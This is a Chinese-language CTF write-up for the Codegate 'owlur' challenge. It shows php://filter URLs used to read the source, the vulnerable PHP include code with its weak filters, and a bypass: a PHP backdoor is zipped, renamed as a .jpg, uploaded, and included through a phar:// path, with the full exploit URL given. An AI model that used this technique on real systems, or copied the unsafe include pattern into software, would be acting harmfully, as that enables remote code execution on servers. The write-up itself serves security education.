Ourren

关注技术,记录生活.

Phar突破文件包含

| 留言

Codegate CTF中owlur的一点解题技巧,通过测试发现网站有文件包含可以通过php://filter读取页面源文件,对php://filter不熟悉的可以研究下:

http://x/owlur/index.php?page=php://filter/convert.base64-encode/resource=upload
http://x/owlur/index.php?page=php://filter/string.rot13/resource=ndex

其中读取后的内容是经过编码了的,要看源码记得解码,比如rot13可以在Linux下:

cat 1.php | rot13

而通过源码发现网站存在文件包含漏洞,源文件代码如下:

<?php
$p = $_REQUEST['page'];

if($p == "" || $p == "index")
{
$p = "main";
}

$haq = base64_decode("ICAgICAgICAgICAgICAgICAgIC8tLS0tLS0tLS0KICAgICAgICAgICAgICAgICAgLyAvIC8qKioqKipcCiAgICAgICAgICAgICAgICAgLyAvKioqKi0tICogKlwKICAgICAgLy8oKCg6PDw8PC86KioqKioqKioqM1xYKlwoKDwKICAgICAvWFgvQ1hDJkNHRy8vKiovLS0vLy9YKlZcKiouLmcmCigvVkNDM2dnMC4uLi4uLi4uKi8vWC8vKC8vL1YqQ1wqLi44ODhnZzhnJjNDPAooMyZnRyYuLi4uLi4uLi4uLiouLlhYWC8oKCgvKi5cKi4uLi4uLi5HLzA4ODgzWDxgCi8oPEM4IC4uLi4uLi4uLi4uKi5YWFhYLy8vLzwvLi4qLi4uLi4uLi4uLi4uLi4uM0NeClgvLzw8Ly4uLi4uLi4uLi4uKiZDVlgvLy9WLzw8Ly4qLi4uLi4uLi4uLi4uLi4uOEdDPApYWC9DLzo8L1YuLi4uLi4uLiomM0NWWFZYVlgoPFYqKi4uLi4uLi4uLi4uLi4uLiBnOENeCiAgICBHQy88PC8oLi4uLi44RyYzQ0NWWFhYWFZ+WFYqLi4uLi4uLi4uLi4uLi4uIEM4M1YKICAgICAgIFYvPF48KFg4OCZWLy8oKDw8PDwoKDxePCoqLi4uLi4uLi4uLi4uLi4uWCYmQwogICAgICAgICAgICAgIGA6L0NDVi8oKCg8PCgvVlZWLyouLi4uLi4uLi4uLi4uLigvQyYvCiAgICAgICAgICAgICAgIDw8IF5eKC9WMzNWWC9WQyZYKlZDLi4uLjo8PH48PDwoKFggIGAKICAgICAgICAgICAgICAgVi8oLzwgXiBeXjovWC8oKDw8Xl4tLS1WOn5+PDwoCiAgICAgICAgICAgICAgMyYgICAgICAgICAgICAgICAgICAuXi0vCiAgICAgICAgICAgICAgQyAgL1wgICAgICAgL1wgICAgICAgIHwKICAgICAgICAgICAgIC9DICBcLyAgICAgICBcLyAgICAgICAvLwogUExaIFNUT1AgICAgIDMgICAgICAgICAgICAgICAgICAgIHxcCiAgIEhBQ0tJTkcgICAgQyAgICAgICAgICAgICAgICAgICAvNSoKICAgICAgICAgICAgICBWICAgICAvLS0tLS1cICAgICAgIC8KICAgICAgICAgICAgICBDRyAgfCAgICAgICAgIHwgIDwvLy88CiAgICAgICAgICAgICAgVkdWIHwgICAgICAgICB8IF4oL1g8XgogICAgICAgICAgICAgICAmJjwgIFwtLS0tLS8gIC4oKDwoXgogICAgICAgICAgICAgICAgODMoICAgICAgICAuPCh+YDw8CiAgICAgICAgICAgICAgICAgOFhgICAgICAuPDxeYCBgKCheCiAgICAgICAgICAgICAgICBCQEBDPC5gXl5gICAgICBeKENHJkMoPC5gYAogICAgIENHOEIkQEBAQEBAQEBAJCggICAgICAgICAgXl4oMEBAQEAkODNYPGAKICAgQkBAQEBAQEBAQEBAQEBAQEBAOC8gICAgICAgYDxDJEBAQEBAQEBAQEAkJjwKICBAQEBAQEBAQEBAQEBAQEAkJCRAQEAkJDA4ODhCQEBAQEBAQEBAQEBAQEBAQEBWYAogQEBAQEBAQEBAQEBAQEAkQCQkJCQkJCRAQEBAJCRAQEAkQEBAQEBAQEBAQEBAQEBDYApAQEBAQEBAQEBAQEBAQCRAJCQkJCQkJCQkJCQkJCQkJCQkQEBAQEBAQEBAQEBAQEBAKGAKQEBAQEBAQEBAQEAkQCQkJCQkJCQkJCQkJCQkQEAkJEBAQEBAQEBAQEBAQEBAQEBAQEIK");
$haq = htmlentities($haq);

if(strstr($p,"..") !== FALSE)
die("<pre>$haq</pre>");

if(stristr($p,"http") !== FALSE)
die("<pre>$haq</pre>");

if(stristr($p,"ftp") !== FALSE)
die("<pre>$haq</pre>");

if(strlen($p) >= 60)
die("<pre>string > 60
$haq</pre>");

$inc = sprintf("%s.php",$p);

?>
<?php
include($inc);
?>

可以发现其实page参数可以控制,然后会在后面加一个包含的文件名后面加一个“.php”进行文件包含。

另外而此程序可以上传图片,而上传时只能上传jpg图片,其实程序只检测了后缀是不是jpg结尾的,同时在另存为时程序会自动重命名:随机字符串*6.jpg,也就是说:

xxxx.jpg ---->randon.jpg

其实他没有检测该上传文件是否合法,所以原始文件可以上传上去的,只不过后缀给改为.jpg了。因此我们可以上传我们需要的文件,但是怎么进行包含,这个确实很考脑力:

  • 上传的文件不能直接包含,因为直接包含上传文件会变为:xxx.jpg.php,不能解析,并且传递的长度超过60;
  • 不存在截断,因为php版本为:5.5.x;
  • 远程包含过滤了http,ftp,因此只能考虑其他协议,大家可能首先会想到data://, php://input,很可惜全部失效;

查询PHP手册发现PHP支持如下的Wrappers

  • file:// — Accessing local filesystem
  • http:// — Accessing HTTP(s) URLs
  • ftp:// — Accessing FTP(s) URLs
  • php:// — Accessing various I/O streams
  • zlib:// — Compression Streams
  • data:// — Data (RFC 2397)
  • glob:// — Find pathnames matching pattern
  • phar:// — PHP Archive
  • ssh2:// — Secure Shell 2
  • rar:// — RAR
  • ogg:// — Audio streams
  • expect:// — Process Interaction Streams

排除上面的测试结果只能测试其它的,于是开始测试file://(无效),SMB(本地可行,本地环境不行),ssh2://(不行),当时测试了很多环境没搞定,暂时就没搞了。「在这里备注下:发现digitalocean开一个临时的VPS来玩比赛挺好的,随时开关也不怎么费钱,还公网IP」;

后来内部有人提测试下phar://,好吧,厚着脸皮再玩下,其实原来在开发yii2的时候有使用composer这个工具,貌似也是phar的后缀,没怎么注意,一查吓一跳,结果phar是php5.3以后引入的,其实就是一个zip打包的文件,这。。。

果断下载一个backdoor,然后压缩为zip,然后修改后缀为.jpg,上传成功并得到目标文件地址,整个过程可以这样子描述:

phpspy.php->x.php->x.zip->x.jpg->upload->xsssa.jpg

于是构造路径并通过phar://进行访问,你猜怎么着,居然成功了,顺利得到flag:

http://54.65.205.135/owlur/index.php?page=phar:///var/www/owlur/owlur-upload-zzzzzz/O6i51MF.jpg/1

其中O6i51MF.jpg是一个zip文件,里面有一个1.php的后门。后来听说zip://这样子也可以,so?